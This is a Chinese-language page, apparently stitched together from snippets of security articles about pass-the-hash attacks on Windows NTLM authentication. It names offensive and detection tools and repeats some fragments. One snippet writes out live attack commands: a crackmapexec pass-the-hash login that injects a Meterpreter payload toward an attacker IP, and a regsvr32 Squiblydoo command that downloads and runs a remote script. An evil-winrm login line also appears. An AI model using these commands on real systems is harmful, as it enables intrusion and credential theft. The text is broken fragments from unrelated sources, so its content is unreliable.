免责声明:本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!
显然,微软提供的补丁并没有真正修复关于SCF 文件的自动执行,Juan Diego 虽然无法给出解释根由但致力于修补一个存在二十年之久、且被称之为 pass-the-hash 的攻击, 它能自动共享 NTLM 哈希与服务器位于用户的外部网络;类似这样的问题在很多针对 Windows 的攻击中都有体现;比如,在今年春季, pass-the-hash 结合 Chrome 与 SCF文件来窃取用户凭据, 且在 2015 、16年,pass-the-hash 攻击均有出现过。 Stefan 表示其实有更多的方法能破解 pass-the-hash 攻击。相应的,Diego 也给出支持性回应表示正在研究相关破解方法。 当然,最好最直接的还是不要分享无需密码的文件。
关于Ketshash Ketshash是一款针对NTLM安全的分析与检测工具,该工具可以帮助广大研究人员基于事件查看器日志来分析和检测可疑的特权NTLM连接,尤其是Pass-The-Hash攻击。 该工具作为“Pass-The-Hash detection”研究的一部分,以完整开源的形式发布给广大研究人员使用。
NTLM认证攻防:权限流转的命脉 深度聚焦NTLM协议攻击面 实战NTLM Relay(SMB/HTTP中继) 利用Responder进行LLMNR/NBT-NS投毒 掌握Pass-The-Hash和Pass-The-Ticket
执行使用bloodyAD包找到的路径 由于 autobloody 依赖于bloodyAD,它支持使用明文密码、pass-the-hash、pass-the-ticket 或证书进行身份验证,并绑定到域控制器的
占用更小的空间内存(工具代码量小于500行) 减少服务器上的操作频率 模块化 线程化 RedSnarf功能包括: 检索本地SAM散列 枚举当前以系统权限运行的用户及其相应的lsa密码; 检索MS缓存凭证; Pass-the-hash
占用更小的空间内存(工具代码量小于500行) 减少服务器上的操作频率 模块化 线程化 RedSnarf功能包括: 检索本地SAM散列 枚举当前以系统权限运行的用户及其相应的lsa密码; 检索MS缓存凭证; Pass-the-hash
技术手段与工具初始入侵:使用鱼叉式网络钓鱼邮件、社会工程学和恶意附件获取初始访问权限 持久化:部署自定义恶意软件、后门和远程访问木马(RAT)维持长期访问 横向移动:利用凭据窃取、哈希传递技术(Pass-the-Hash
关于SharpNamedPipePTH SharpNamedPipePTH是一款基于C#开发的安全工具,该工具可以利用哈希传递技术(Pass-the-Hash)在本地命名管道上进行身份认证,并实现用户令牌模拟
PTH 即Pass-The-Hash,首先我们来说下为什么要使用HASH传递,一是再目标机>=win server 2012时,lsass.exe进程中是抓不到明文密码的,二是随着信息安全意识的提高,弱口令情况逐渐降低
对方主机需开启C共享,传送门:smbexec的使用(c$共享) WinRM远程连接:对方主机需开启WinRM服务,传送门:工具使用 | WinRM远程管理工具的使用 哈希传递攻击:内网渗透 | 哈希传递攻击(Pass-the-Hash
PTH (pass-the-hash)在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。
Pass-the-hash 横向移动中的哈希传递: ? 外部模块 横向移动的一些常用模块: ? ? Persistence 权限维持 ? Empire to Meterpreter ?
使用BloodHound数据和Neo4j查询来寻找最佳的权限提升路径; 2、使用bloodyAD包执行搜索到的提权路径; Autobloody基于bloodyAD实现其功能,而这个包支持使用明文密码、pass-the-hash
这类hash并不能直接用于pass-the-hash攻击,但可以通过暴力破解的方式来获取明文密码。 在拿到hash之后,我们一般会考虑破解出hash明文密码,或者利用pass-the-hash技术在无需明文密码的情况下进行特权操作。 常用Pass-The-Hash工具: Crackmapexec Mimikatz smbmap smbexec metasploit cobaltstrike Crackmapexec 1.安装 crackmapexec administrator -H AFC44EE7351D61D00698796DA06B1EBF -M met_inject -o LHOST=17.10.0.1 LPORT=9999 命令的意思是通过pass-the-hash following command on the target machine: regsvr32 /s /n /u /i:http://17.10.0.1:8080/1KZkey.sct scrobj.dll 通过pass-the-hash
这意味着一旦攻击者获得 DSRM 帐户的密码哈希,就可以使用 Pass-the-Hash 将其“传递”到 DC,以便管理员通过网络对 DC 进行有效访问。
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S NTLM哈希登录: 可以通过利用evil-winrm工具执行传递哈希攻击(Pass-The-Hash
这个请求可以用来恢复NTLM哈希来进行pass-the-hash攻击。 这种利用regsvr32来进行恶意攻击的技术被称为Squiblydoo,之前也有过相关介绍。
06 Pass-The-Hash Evil-winrm是一款使用ruby 语言开发的开源工具。
file 这个模块可以读取已经打包的内存信息 比如我们之前已经将lsass 进程中的内存信息保存为dmp 文件了,那么此时我们可以离线的读取其中的信息了 需要制定文件名 sekurlsa::pth pass-the-hash